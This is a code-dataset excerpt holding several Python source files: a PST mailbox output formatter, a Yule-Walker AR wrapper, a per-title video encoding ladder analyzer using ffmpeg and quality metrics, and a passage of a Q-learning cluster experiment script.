hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
79544e8236b19db6b0a905707350074ea5a84957 | 3,936 | py | Python | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | 3 | 2019-11-06T23:22:03.000Z | 2021-03-15T21:42:34.000Z | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | 2 | 2017-05-02T08:19:33.000Z | 2017-05-04T12:15:06.000Z | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | null | null | null |
import csv
import sys
# registry of formatters filled when subclasses are created
formatters = {}
def available_formatters():
return formatters.keys()
def from_name(name="screen", output=sys.stdout, args=None):
"""
Helper function to create correct formatter based on type passed
Args:
- name (str): the name of formatter to create
- output (file): the output location
Returns:
found PSTFormatter implementation
"""
return formatters[name](output=output, args=args)
class PSTFormatterMeta(type):
"""used by PSTFormatter to validate sub classes and also auto register into formatters dict"""
@staticmethod
def _name_defined(name, fields):
if not "name" in fields:
raise ValueError("name not defined in %s" % name)
@staticmethod
def _register_formatter(name, cls):
formatter_name = name
formatters[formatter_name] = cls
def __new__(meta, name, bases, class_dict):
cls = type.__new__(meta, name, bases, class_dict)
if name == "PSTFormatter":
return cls
PSTFormatterMeta._name_defined(name, class_dict)
PSTFormatterMeta._register_formatter(class_dict["name"], cls)
return cls
class PSTFormatter(object):
"""base class for formatters"""
# allows sub classes to be automatically registered
__metaclass__ = PSTFormatterMeta
# specified by sub classes
name = None
def __init__(self, output=None, args=None):
assert output is not None, "output must be provided"
self._output = output
self._args = args
def format_folder(self, path, folder):
raise NotImplementedError()
def format_message(self, message):
raise NotImplementedError()
class PSTScreenFormatter(PSTFormatter):
"""formats output for screen"""
name = "screen"
def __init__(self, output, args):
super(PSTScreenFormatter, self).__init__(output, args)
def format_folder(self, path, folder):
formatted_path = "root" if path is None else "/".join(map(str, path))
print >> self._output, "Path: %s" % formatted_path
print >> self._output, "ID: %s" % folder.identifier
print >> self._output, "Name: %s" % folder.name
print >> self._output, "No. of sub folders: %d" % folder.number_of_sub_folders
print >> self._output, "No. of messages: %d" % folder.number_of_messages
if folder.has_sub_folders:
print >> self._output, "Sub folders:"
for sub_folder in folder.get_folders_iter():
if path is None:
print >> self._output, "%d: %s" % (sub_folder.index, sub_folder.name)
else:
print >> self._output, "%s/%d: %s" % (formatted_path, sub_folder.index, sub_folder.name)
def format_message(self, message):
print >> self._output, "%d:" % message.index,
print >> self._output, "-" * 80
print >> self._output, "%s" % message.subject
print >> self._output, "Sender: %s" % message.sender
print >> self._output, "No. of attachments: %d" % message.number_of_attachments
if self._args.include_plaintext:
print >> self._output, "Plaintext:"
print >> self._output, message.plain_text
if self._args.include_html:
print >> self._output, "HTML:"
print >> self._output, message.html
class PSTCSVFormatter(PSTFormatter):
"""formats output into csv"""
name = "csv"
def __init__(self, output=None, args=None):
super(PSTCSVFormatter, self).__init__(output, args)
def format_folder(self, path, folder):
pass
def format_message(self, message):
pass
| 30.75 | 108 | 0.607978 |
79544e8906f7c735e6b8bcc9ae69db560a1bb415 | 4,162 | py | Python | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 37 | 2015-02-01T12:03:48.000Z | 2021-12-23T14:38:38.000Z | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 2 | 2015-07-27T11:34:24.000Z | 2019-12-11T13:39:18.000Z | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 19 | 2016-09-06T20:23:19.000Z | 2021-11-07T16:07:40.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Jan 22 20:38 2014
@author: Sammy Pfeiffer
@email: sammypfeiffer@gmail.com
This file pretends to imitate the behaviour of the MATLAB function aryule
Using spectrum implementation:
http://thomas-cokelaer.info/software/spectrum/html/user/ref_param.html#spectrum.yulewalker.aryule
"""
import numpy as np
import spectrum
def aryule(x, p):
"""From MATLAB:
% A = ARYULE(X,ORDER) returns the polynomial A corresponding to the AR
% parametric signal model estimate of vector X using the Yule-Walker
% (autocorrelation) method. ORDER is the model order of the AR system.
% This method solves the Yule-Walker equations by means of the Levinson-
% Durbin recursion.
%
% [A,E] = ARYULE(...) returns the final prediction error E (the variance
% estimate of the white noise input to the AR model).
%
% [A,E,K] = ARYULE(...) returns the vector K of reflection coefficients.
Using spectrum aryule:
def aryule(X, order, norm='biased', allow_singularity=True):
Compute AR coefficients using Yule-Walker method
:param X: Array of complex data values, X(1) to X(N)
:param int order: Order of autoregressive process to be fitted (integer)
:param str norm: Use a biased or unbiased correlation.
:param bool allow_singularity:
:return:
* AR coefficients (complex)
* variance of white noise (Real)
* reflection coefficients for use in lattice filter
"""
[A, E, K] = spectrum.aryule(x, p)
A = np.hstack((1, A)) # MATLAB adds the first "1.0"
return A, E, K
# Local Variables: a, e, k, nx, p, R, x, mx
# Function calls: aryule, nargchk, min, issparse, nargin, length, isempty, error, levinson, message, xcorr, round, size
#%ARYULE AR parameter estimation via Yule-Walker method.
#% A = ARYULE(X,ORDER) returns the polynomial A corresponding to the AR
#% parametric signal model estimate of vector X using the Yule-Walker
#% (autocorrelation) method. ORDER is the model order of the AR system.
#% This method solves the Yule-Walker equations by means of the Levinson-
#% Durbin recursion.
#%
#% [A,E] = ARYULE(...) returns the final prediction error E (the variance
#% estimate of the white noise input to the AR model).
#%
#% [A,E,K] = ARYULE(...) returns the vector K of reflection coefficients.
#%
#% % Example:
#% % Estimate model order using decay of reflection coefficients.
#%
#% rng default;
#% y=filter(1,[1 -0.75 0.5],0.2*randn(1024,1));
#%
#% % Create AR(2) process
#% [ar_coeffs,NoiseVariance,reflect_coeffs]=aryule(y,10);
#%
#% % Fit AR(10) model
#% stem(reflect_coeffs); axis([-0.05 10.5 -1 1]);
#% title('Reflection Coefficients by Lag'); xlabel('Lag');
#% ylabel('Reflection Coefficent');
#%
#% See also PYULEAR, ARMCOV, ARBURG, ARCOV, LPC, PRONY.
#% Ref: S. Orfanidis, OPTIMUM SIGNAL PROCESSING, 2nd Ed.
#% Macmillan, 1988, Chapter 5
#% M. Hayes, STATISTICAL DIGITAL SIGNAL PROCESSING AND MODELING,
#% John Wiley & Sons, 1996, Chapter 8
#% Author(s): R. Losada
#% Copyright 1988-2004 The MathWorks, Inc.
#% $Revision: 1.12.4.6 $ $Date: 2012/10/29 19:30:38 $
# matcompat.error(nargchk(2., 2., nargin, 'struct'))
# #% Check the input data type. Single precision is not supported.
# #%try
# #% chkinputdatatype(x,p);
# #%catch ME
# #% throwAsCaller(ME);
# #%end
# [mx, nx] = matcompat.size(x)
# if isempty(x) or length(x)<p or matcompat.max(mx, nx) > 1.:
# matcompat.error(message('signal:aryule:InvalidDimensions'))
# elif isempty(p) or not p == np.round(p):
# matcompat.error(message('signal:aryule:MustBeInteger'))
#
#
# if issparse(x):
# matcompat.error(message('signal:aryule:Sparse'))
#
#
# R = plt.xcorr(x, p, 'biased')
# [a, e, k] = levinson(R[int(p+1.)-1:], p)
# return [a, e, k] | 40.019231 | 123 | 0.617972 |
79544eba54ebe1c56e3a007c39f9a1886b197d32 | 25,701 | py | Python | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | null | null | null | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | null | null | null | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | 4 | 2018-08-31T08:41:40.000Z | 2020-05-21T09:04:09.000Z | # -*- coding: utf-8 -*-
#importation
from __future__ import division
from pylab import *
import sys
import os
import json
import datetime
import statistics
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from task_providers import Probe, CrfEncode, CbrEncode, Metric
class EncodingProfile(object):
"""This class defines an encoding profile"""
def __init__(self, width, height, bitrate_default, bitrate_min, bitrate_max, required, bitrate_steps_individual):
"""EncodingProfile initialization
:param width: Video profile width
:type width: int
:param height: Video profile height
:type height: int
:param bitrate_default: Video profile bitrate default (in bits per second)
:type bitrate_default: int
:param bitrate_min: Video profile bitrate min constraint (in bits per second)
:type bitrate_min: int
:param bitrate_max: Video profile bitrate max constraint (in bits per second)
:type bitrate_max: int
:param required: The video profile is required and cannot be removed from the optimized encoding ladder
:type required: bool
:param bitrate_steps_individual: Step Bitrate Range defined for each Video profile (in bits per second)
:type bitrate_steps_individual: int
"""
#call: PROFILE_LIST.append(pta.EncodingProfile(480, 270, 300000, 150000, 500000, True, 150000))
if width is None:
raise ValueError('The EncodingProfile.width value is required')
else:
self.width = int(width)
if height is None:
raise ValueError('The EncodingProfile.height value is required')
else:
self.height = int(height)
if bitrate_default is None:
raise ValueError('The EncodingProfile.bitrate_default value is required')
else:
self.bitrate_default = int(bitrate_default)
if int(bitrate_min) <= self.bitrate_default:
self.bitrate_min = int(bitrate_min)
else:
self.bitrate_min = self.bitrate_default
if int(bitrate_max) >= self.bitrate_default:
self.bitrate_max = int(bitrate_max)
else:
self.bitrate_max = self.bitrate_default
if bitrate_steps_individual is None:
self.bitrate_steps_individual = None
else:
self.bitrate_steps_individual = int(bitrate_steps_individual)
if required is not None:
self.required = required
else:
self.required = True
self.bitrate_factor = None
def __str__(self):
"""Display the encoding profile informations
:return: human readable string describing an encoding profil object
:rtype: str
"""
return "{}x{}, bitrate_default={}, bitrate_min={}, bitrate_max={}, bitrate_steps_individual{}, bitrate_factor={}, required={}".format(self.width, self.height, self.bitrate_default, self.bitrate_min, self.bitrate_max, self.bitrate_steps_individual, self.bitrate_factor, self.required)
def get_json(self):
"""Return object details in json
:return: json object describing the encoding profile and the configured constraints
:rtype: str
"""
profile = {}
profile['width'] = self.width
profile['height'] = self.height
profile['bitrate'] = self.bitrate_default
profile['constraints'] = {}
profile['constraints']['bitrate_min'] = self.bitrate_min
profile['constraints']['bitrate_max'] = self.bitrate_max
profile['constraints']['bitrate_factor'] = self.bitrate_factor
profile['constraints']['required'] = self.required
return json.dumps(profile)
def set_bitrate_factor(self, ladder_max_bitrate):
"""Set the bitrate factor from the max bitrate in the encoding ladder"""
self.bitrate_factor = ladder_max_bitrate/self.bitrate_default
class EncodingLadder(object):
"""This class defines an over-the-top encoding ladder template"""
def __init__(self, encoding_profile_list):
"""EncodingLadder initialization
:param encoding_profile_list: A list of multiple encoding profiles
:type encoding_profile_list: per_title.EncodingProfile[]
"""
#call: LADDER = pta.EncodingLadder(PROFILE_LIST)
self.encoding_profile_list = encoding_profile_list
self.calculate_bitrate_factors()
def __str__(self):
"""Display the encoding ladder informations
:return: human readable string describing the encoding ladder template
:rtype: str
"""
string = "{} encoding profiles\n".format(len(self.encoding_profile_list))
for encoding_profile in self.encoding_profile_list:
string += str(encoding_profile) + "\n"
return string
def get_json(self):
"""Return object details in json
:return: json object describing the encoding ladder template
:rtype: str
"""
ladder = {}
ladder['overall_bitrate_ladder'] = self.get_overall_bitrate()
ladder['encoding_profiles'] = []
for encoding_profile in self.encoding_profile_list:
ladder['encoding_profiles'].append(json.loads(encoding_profile.get_json()))
return json.dumps(ladder)
def get_max_bitrate(self):
"""Get the max bitrate in the ladder
:return: The maximum bitrate into the encoding laddder template
:rtype: int
"""
ladder_max_bitrate = 0
for encoding_profile in self.encoding_profile_list:
if encoding_profile.bitrate_default > ladder_max_bitrate:
ladder_max_bitrate = encoding_profile.bitrate_default
return ladder_max_bitrate
def get_overall_bitrate(self):
"""Get the overall bitrate for the ladder
:return: The sum of all bitrate profiles into the encoding laddder template
:rtype: int
"""
ladder_overall_bitrate = 0
for encoding_profile in self.encoding_profile_list:
ladder_overall_bitrate += encoding_profile.bitrate_default
return ladder_overall_bitrate
def calculate_bitrate_factors(self): #cf plus haut !
"""Calculate the bitrate factor for each profile"""
ladder_max_bitrate = self.get_max_bitrate()
for encoding_profile in self.encoding_profile_list:
encoding_profile.set_bitrate_factor(ladder_max_bitrate)
class Analyzer(object):
"""This class defines a Per-Title Analyzer"""
def __init__(self, input_file_path, encoding_ladder):
"""Analyzer initialization
:param input_file_path: The input video file path
:type input_file_path: str
:param encoding_ladder: An EncodingLadder object
:type encoding_ladder: per_title.EncodingLadder
"""
self.input_file_path = input_file_path
self.encoding_ladder = encoding_ladder
self.average_bitrate = None
self.standard_deviation = None
self.optimal_bitrate = None
self.peak_bitrate = None
# init json result
self.json = {}
self.json['input_file_path'] = self.input_file_path
self.json['template_encoding_ladder'] = json.loads(self.encoding_ladder.get_json())
self.json['analyses'] = []
def __str__(self):
"""Display the per title analysis informations
:return: human readable string describing all analyzer configuration
:rtype: str
"""
string = "Per-Title Analysis for: {}\n".format(self.input_file_path)
string += str(self.encoding_ladder)
return string
def get_json(self):
"""Return object details in json
:return: json object describing all inputs configuration and output analyses
:rtype: str
"""
return json.dumps(self.json, indent=4, sort_keys=True)
class CrfAnalyzer(Analyzer):
"""This class defines a Per-Title Analyzer based on calculating the top bitrate wit CRF, then deducting the ladder"""
def set_bitrate(self,number_of_parts):
"""In linear mode, optimal_bitrates are defined from the first analysis thanks to the bitrate_factor
: print results in linear mode for CRF analyzer
"""
overall_bitrate_optimal = 0
for encoding_profile in self.encoding_ladder.encoding_profile_list:
target_bitrate = int(self.optimal_bitrate/encoding_profile.bitrate_factor)
remove_profile = False
if target_bitrate < encoding_profile.bitrate_min and encoding_profile.required is False:
remove_profile = True
if target_bitrate < encoding_profile.bitrate_min:
target_bitrate = encoding_profile.bitrate_min
if target_bitrate > encoding_profile.bitrate_max:
target_bitrate = encoding_profile.bitrate_max
if remove_profile is False:
overall_bitrate_optimal += target_bitrate
print(' ',encoding_profile.width,'x',encoding_profile.height,' ',target_bitrate*1e-3,'kbps linear',' / nbr part:',number_of_parts,' ')
def process(self, number_of_parts, width, height, crf_value, idr_interval, model):
"""Do the necessary crf encodings and assessments
:param number_of_parts: Number of part/segment for the analysis
:type number_of_parts: int
:param width: Width of the CRF encode
:type width: int
:param height: Height of the CRF encode
:type height: int
:param crf_value: Constant Rate Factor: this is a constant quality factor, see ffmpeg.org for more documentation on this parameter
:type crf_value: int
:param idr_interval: IDR interval in seconds
:type idr_interval: int
:param model: linear (True) or for each (False)
:type model: bool
"""
# Start by probing the input video file
input_probe = Probe(self.input_file_path)
input_probe.execute()
crf_bitrate_list = []
part_duration = input_probe.duration/number_of_parts
idr_interval_frames = idr_interval*input_probe.framerate #rcl: An IDR frame is a special type of I-frame in H.264. An IDR frame specifies that no frame after the IDR frame can reference any frame before it. This makes seeking the H.264 file easier and more responsive in the player.
#As I have an IDR_FRAME every 2 seconds, I can find out the number of frame between two IDR using framerate !
# Start Analysis
for i in range(0,number_of_parts):
part_start_time = i*part_duration #select extracts to encode
# Do a CRF encode for the input file
crf_encode = CrfEncode(self.input_file_path, width, height, crf_value, idr_interval_frames, part_start_time, part_duration)
crf_encode.execute()
# Get the Bitrate from the CRF encoded file
crf_probe = Probe(crf_encode.output_file_path)
crf_probe.execute()
# Remove temporary CRF encoded file
os.remove(crf_encode.output_file_path)
# Set the crf bitrate
crf_bitrate_list.append(crf_probe.bitrate)
# Calculate the average bitrate for all CRF encodings
self.average_bitrate = statistics.mean(crf_bitrate_list)
self.peak_bitrate = max(crf_bitrate_list)
if number_of_parts > 1:
# Calculate the the standard deviation of crf bitrate values
self.standard_deviation = statistics.stdev(crf_bitrate_list)
weight = 1
weighted_bitrate_sum = 0
weighted_bitrate_len = 0
# Giving weight for each bitrate based on the standard deviation
for bitrate in crf_bitrate_list:
if bitrate > (self.average_bitrate + self.standard_deviation):
weight = 4
elif bitrate > (self.average_bitrate + self.standard_deviation/2):
weight = 2
elif bitrate < (self.average_bitrate - self.standard_deviation/2):
weight = 0.5
elif bitrate < (self.average_bitrate - self.standard_deviation):
weight = 0
else:
weight = 1
weighted_bitrate_sum += weight*bitrate
weighted_bitrate_len += weight
# Set the optimal bitrate from the weighted bitrate of all crf encoded parts
self.optimal_bitrate = weighted_bitrate_sum/weighted_bitrate_len
else:
# Set the optimal bitrate from the only one crf result
self.optimal_bitrate = self.average_bitrate
if not model:
print(' ',width,'x',height,' ',self.optimal_bitrate*1e-3,'kbps encode_for_each','/ nbr part:',number_of_parts,' ')
if model:
# We calculate optimal bitrate of the the remaining profiles using bitrate factor
self.set_bitrate(number_of_parts)
# Adding results to json
result = {}
result['processing_date'] = str(datetime.datetime.now())
result['parameters'] = {}
result['parameters']['method'] = "CRF"
result['parameters']['width'] = width
result['parameters']['height'] = height
result['parameters']['crf_value'] = crf_value
result['parameters']['idr_interval'] = idr_interval
result['parameters']['number_of_parts'] = number_of_parts
result['parameters']['part_duration'] = part_duration
result['bitrate'] = {}
result['bitrate']['optimal'] = self.optimal_bitrate
result['bitrate']['average'] = self.average_bitrate
result['bitrate']['peak'] = self.average_bitrate
result['bitrate']['standard_deviation'] = self.standard_deviation
result['optimized_encoding_ladder'] = {}
if model == "True":
result['optimized_encoding_ladder']['model'] = "linear"
if model == "False":
result['optimized_encoding_ladder']['model'] = "encode_for_each"
self.json['analyses'].append(result)
class MetricAnalyzer(Analyzer):
"""This class defines a Per-Title Analyzer based on VQ Metric and Multiple bitrate encodes"""
def process(self, metric, limit_metric, bitrate_steps_by_default, idr_interval, steps_individual_bitrate_required):
"""Do the necessary encodings and quality metric assessments
:param metric: Supporting "ssim" or "psnr"
:type metric: string
:param limit_metric: limit value of "ssim" or "psnr" use to find optimal bitrate
:type limit_metric: int
:param bitrate_steps_by_default: Bitrate gap between every encoding, only use if steps_individual_bitrate_required is False
:type bitrate_steps_by_default: int
:param idr_interval: IDR interval in seconds
:type idr_interval: int
:param steps_individual_bitrate_required: The step is the same for each profile and cannot be set individually if False
:type steps_individual_bitrate_required: bool
"""
# Start by probing the input video file
input_probe = Probe(self.input_file_path)
input_probe.execute()
part_start_time = 0
part_duration = input_probe.duration
idr_interval_frames = idr_interval*input_probe.framerate
metric = str(metric).strip().lower()
#Create two lists for GRAPH 2
optimal_bitrate_array = []
default_bitrate_array = []
print('\n********************************\n********Encoding Started********\n********************************\n')
print('File Selected: ', os.path.basename(self.input_file_path))
# Adding results to json
json_ouput = {}
json_ouput['processing_date'] = str(datetime.datetime.now())
json_ouput['parameters'] = {}
json_ouput['parameters']['method'] = "Metric"
json_ouput['parameters']['metric'] = metric
json_ouput['parameters']['bitrate_steps'] = bitrate_steps_by_default
json_ouput['parameters']['idr_interval'] = idr_interval
json_ouput['parameters']['number_of_parts'] = 1
json_ouput['parameters']['part_duration'] = part_duration
json_ouput['optimized_encoding_ladder'] = {}
json_ouput['optimized_encoding_ladder']['encoding_profiles'] = []
# Start Analysis
for encoding_profile in self.encoding_ladder.encoding_profile_list:
profile = {}
profile['width'] = encoding_profile.width
profile['height'] = encoding_profile.height
profile['cbr_encodings'] = []
profile['optimal_bitrate'] = None
default_bitrate_array.append(encoding_profile.bitrate_default)
if steps_individual_bitrate_required:
bitrate_steps_by_default = encoding_profile.bitrate_steps_individual
print('\n\n __________________________________________')
print(' The bitrate_step is: ',bitrate_steps_by_default*10**(-3),'kbps')
print('\n |||',encoding_profile.width, 'x', encoding_profile.height,'|||\n')
last_metric_value = 0
last_quality_step_ratio = 0
bitrate_array = []
quality_array = []
for bitrate in range(encoding_profile.bitrate_min, (encoding_profile.bitrate_max + bitrate_steps_by_default), bitrate_steps_by_default):
# Do a CBR encode for the input file
cbr_encode = CbrEncode(self.input_file_path, encoding_profile.width, encoding_profile.height, bitrate, idr_interval_frames, part_start_time, part_duration)
cbr_encode.execute()
print('cbr_encode -> in progress -> ->')
# Get the Bitrate from the CBR encoded file
metric_assessment = Metric(metric, cbr_encode.output_file_path, self.input_file_path, input_probe.width, input_probe.height)
metric_assessment.execute()
print('-> -> probe |>', bitrate*10**(-3),'kbps |>',metric,' = ',metric_assessment.output_value, '\n')
# Remove temporary CBR encoded file
os.remove(cbr_encode.output_file_path)
# OLD method to find optimal bitrate_min
# if last_metric_value is 0 :
# # for first value, you cannot calculate acurate jump in quality from nothing
# last_metric_value = metric_assessment.output_value
# profile['optimal_bitrate'] = bitrate
# quality_step_ratio = (metric_assessment.output_value)/bitrate # first step from null to the starting bitrate
# else:
# quality_step_ratio = (metric_assessment.output_value - last_metric_value)/bitrate_steps_by_default
#
# if quality_step_ratio >= (last_quality_step_ratio/2):
# profile['optimal_bitrate'] = bitrate
# if 'ssim' in metric:
# if metric_assessment.output_value >= (last_metric_value + 0.01):
# profile['optimal_bitrate'] = bitrate
# elif 'psnr' in metric:
# if metric_assessment.output_value > last_metric_value:
# profile['optimal_bitrate'] = bitrate
# last_metric_value = metric_assessment.output_value
# last_quality_step_ratio = quality_step_ratio
# New method
bitrate_array.append(bitrate) # All bitrate for one profile
print(bitrate_array)
quality_array.append(metric_assessment.output_value) #pour un profile on a toutes les qualités
print(quality_array)
#**************GRAPH 1 matplotlib*************
# Initialize
diff_bitrate_array=1 # X
diff_quality_array=0 # Y
taux_accroissement=1
#Curve
figure(1)
plot(bitrate_array, quality_array, label=str(encoding_profile.width)+'x'+str(encoding_profile.height))
xlabel('bitrate (bps)')
ylabel("quality: "+str(metric).upper())
title(str(self.input_file_path))
# Rate of change and find out the optimal bitrate in the array
for j in range(0, len(quality_array)-1):
diff_quality_array=quality_array[j+1]-quality_array[j]
diff_bitrate_array=bitrate_array[j+1]-bitrate_array[j]
#limited_evolution_metric=0.005 -> indication: set arround 0.1 for psnr with a 100000 bps bitrate step and 0.05 with a 50000 bitrate step for ssim
limited_evolution_metric=limit_metric
taux_accroissement = diff_quality_array/diff_bitrate_array
encoding = {}
encoding['bitrate'] = bitrate_array[j]
encoding['metric_value'] = quality_array[j]
encoding['quality_step_ratio'] = taux_accroissement
profile['cbr_encodings'].append(encoding)
if taux_accroissement <= limited_evolution_metric/bitrate_steps_by_default:
#scatter(bitrate_array[j], quality_array[j]) # I found out the good point
break
# Display good values !
print ('\nI found the best values for ||--- ', str(encoding_profile.width)+'x'+str(encoding_profile.height),' ---|| >> ',metric,':',quality_array[j],'| bitrate = ',bitrate_array[j]*10**(-3),'kbps')
optimal_bitrate_array.append(bitrate_array[j]) # use in GRAPH 2
profile['optimal_bitrate'] = bitrate_array[j]
profile['bitrate_savings'] = encoding_profile.bitrate_default - profile['optimal_bitrate']
# Graph annotations
annotation=str(bitrate_array[j]*1e-3)+' kbps'
#plot([bitrate_array[j],bitrate_array[j]], [0, quality_array[j]], linestyle='--' )
annotate(annotation, xy=(bitrate_array[j], quality_array[j]), xycoords='data', xytext=(+1, +20), textcoords='offset points', fontsize=8, arrowprops=dict(arrowstyle="->", connectionstyle="arc,rad=0.2"))
#plot([0, bitrate_array[j]], [quality_array[j], quality_array[j]], linestyle='--' )
scatter(bitrate_array[j], quality_array[j], s=7)
grid()
legend()
draw()
show(block=False)
pause(0.001)
#save graph1 and plot graph2
name=str(os.path.basename(self.input_file_path))
input("\n\n\nPress [enter] to continue, This will close the graphic and save the figure as ''file_name_metric_limit_metric.png'' !")
newpath = str(os.getcwd())+"/results/%s" % (name)
#newpath = '/home/labo/Documents/per_title_analysis/results/%s' % (name)
if not os.path.exists(newpath):
os.makedirs(newpath)
plt.savefig(newpath+"/%s-%s-%s-Per_Title.png" % (name, str(metric).strip().upper(), str(limited_evolution_metric)))
bitrate_data = [list(i) for i in zip(optimal_bitrate_array, default_bitrate_array)]
# GRAH 2 Computation
figure(2)
columns = ('Dynamic (kbps)', 'Fix (kbps)')
rows = ['%s' % resolution for resolution in ('1920 x 1080', '1280 x 720', '960 x 540', '640 x 360', '480 x 270')]
ylabel("bitrate (bps)")
title(str(self.input_file_path))
# Get some pastel shades for the colors
colors = plt.cm.YlOrBr(np.linspace(0.35, 0.8, len(rows)))
#size and positions
n_rows = len(bitrate_data)-1
index = np.arange(len(columns)) + 0.3
bar_width = 0.5
# Initialize the vertical-offset for the stacked bar chart.
y_offset = np.zeros(len(columns))
# Plot bars and create text labels for the table
cell_text = []
for row in range(n_rows+1): # until n_rows
plt.bar(index, bitrate_data[n_rows-row], bar_width, bottom=y_offset, color=colors[row])
y_offset = y_offset + bitrate_data[n_rows-row]
print('this is y_offset',y_offset)
cell_text.append(['%1.1f' % (x / 1000.0) for x in bitrate_data[n_rows-row]])
# Reverse colors and text labels to display the last value at the top.
colors = colors[::-1]
cell_text.reverse()
# Add a table at the bottom of the axes
the_table = plt.table(cellText=cell_text,
rowLabels=rows,
rowColours=colors,
colLabels=columns,
loc='bottom')
# Adjust layout to make room for the table:
plt.subplots_adjust(left=0.5, bottom=0.2)
#plt.ylabel("Loss in ${0}'s".format(value_increment))
#plt.yticks(values * value_increment, ['%d' % val for val in values])
plt.xticks([])
#plt.title('Loss by Disaster')
show(block=False)
pause(0.001)
print('\n\n->->\nloading graphic Histogram\n->->\n\n')
input("Press [enter] to continue, This will close the graphic and save the figure as ''file_name_metric_limit_metric.png'' ")
plt.savefig(newpath+"/%s-%s-%s-Per_Title_Histogram.png" % (name, str(metric).strip().upper(), str(limited_evolution_metric)))
print('\n\n\n************ALL DONE********** !\n\n')
| 43.340641 | 291 | 0.63196 |
79544f059d74b07d8db41f9744080b82352b18e7 | 6,392 | py | Python | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | from .cluster_env import Cluster
from .RL_brain import QLearningTable
import datetime
import numpy as np
import matplotlib.pyplot as plt
import pylab as pl
import random
import pandas as pd
import time
from pandas.testing import assert_frame_equal
def state_init():
init_state = pd.DataFrame(np.zeros(12*4).reshape(12, 4), columns=[0, 1, 2, 3])
for i in range(len(init_state)):
j = random.randint(0, 3)
init_state.iloc[i][j] = 1
return init_state
def server_attribute():
init_state = pd.DataFrame(np.zeros(4*12).reshape(4, 12), columns=np.arange(12))
server = []
attribute_list = range(len(init_state.columns))
for i in range(len(init_state)):
attribute_list = list(set(attribute_list).difference(set(server)))
server = random.sample(attribute_list, 3)
for j in server:
init_state.iloc[i][j] = 1
return init_state
def update():
cost_all_list = []
reward_all_list = []
query_number = len(env.QSs)
# print(query_number)
for episode in episodes:
epoch_curr_time1 = datetime.datetime.now()
# initial state
state_init_arr = env.state_array(env.state_init)
state = (env.state_init).copy()
costs = env.cost_init
sum = 0
reward_list = [0]
state_arr_for_one = state_init_arr
reward = init_reward
while True:
# RL choose action based on observation
# The action here is a number(the index of the real action)
action = RL.choose_action(str(state_arr_for_one))
# RL take action and get next observation and reward
state_, costs_, reward_, cost_all, is_better = env.step(action, state, costs)
state__arr = env.state_array(state_)
different = [y for y in (state_arr_for_one + state__arr) if y not in state_arr_for_one]
print("different:", different)
if ((reward_ < init_reward and reward_ < min(reward_list) or
(len(different) == 0 and reward_ >= reward and reward_ > (init_reward)))):
done = True
else:
done = False
# RL learn from this transition
print("done:", done)
if ((reward_ < init_reward) and (reward_ < min(reward_list))):
re = -1
print("reward值小于初始值或并且该循环的最小值")
elif len(different) == 0 and reward_ >= reward and reward_ > (init_reward):
re = 1
print("reward值大于前一个循环的reward值并且采取动作后状态不改变")
else:
re = 0
reward = reward_
reward_list.append(reward)
RL.learn(str(state_arr_for_one), action, re, str(state__arr), done)
state_arr_for_one = state__arr
different_init = [y for y in (state_init_arr + state__arr) if y not in state_init_arr]
costs = costs_
# q_table=RL.q_table.copy()
state = state_
sum += 1
if done:
break
if (episode+1) % 100 == 0:
reward_all_list.append(reward)
epoch_curr_time2 = datetime.datetime.now()
epoch_time = epoch_curr_time2 - epoch_curr_time1
# if (action in actions and q_table.loc[str(state), action] >= 0) and (done and q_table.loc[str(state), action] >= 0 and reward > 0):
# break
# else:
# actions.append(action)
